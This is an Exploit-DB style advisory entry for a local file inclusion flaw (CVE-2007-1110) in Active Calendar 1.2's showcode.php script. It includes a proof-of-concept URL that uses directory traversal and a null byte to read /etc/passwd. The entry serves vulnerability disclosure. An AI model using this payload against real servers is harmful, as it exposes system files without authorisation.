Active Calendar 1.2 - 'showcode.php' Local File Inclusion

Author: Simon Bonnard
type: webapps
platform: php
port: 
date_added: 2007-02-24  
date_updated: 2013-11-17  
verified: 1  
codes: CVE-2007-1110;OSVDB-33144  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 29645.txt  

source: https://www.securityfocus.com/bid/22704/info

Active Calendar is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

Exploiting this issue may allow an unauthorized user to view files and execute local scripts.

Version 1.2.0 is vulnerable; other versions may also be affected.

http://www.example.com/activecalendar/data/showcode.php?page=../../../../../../../../../../../../../../etc/passwd%00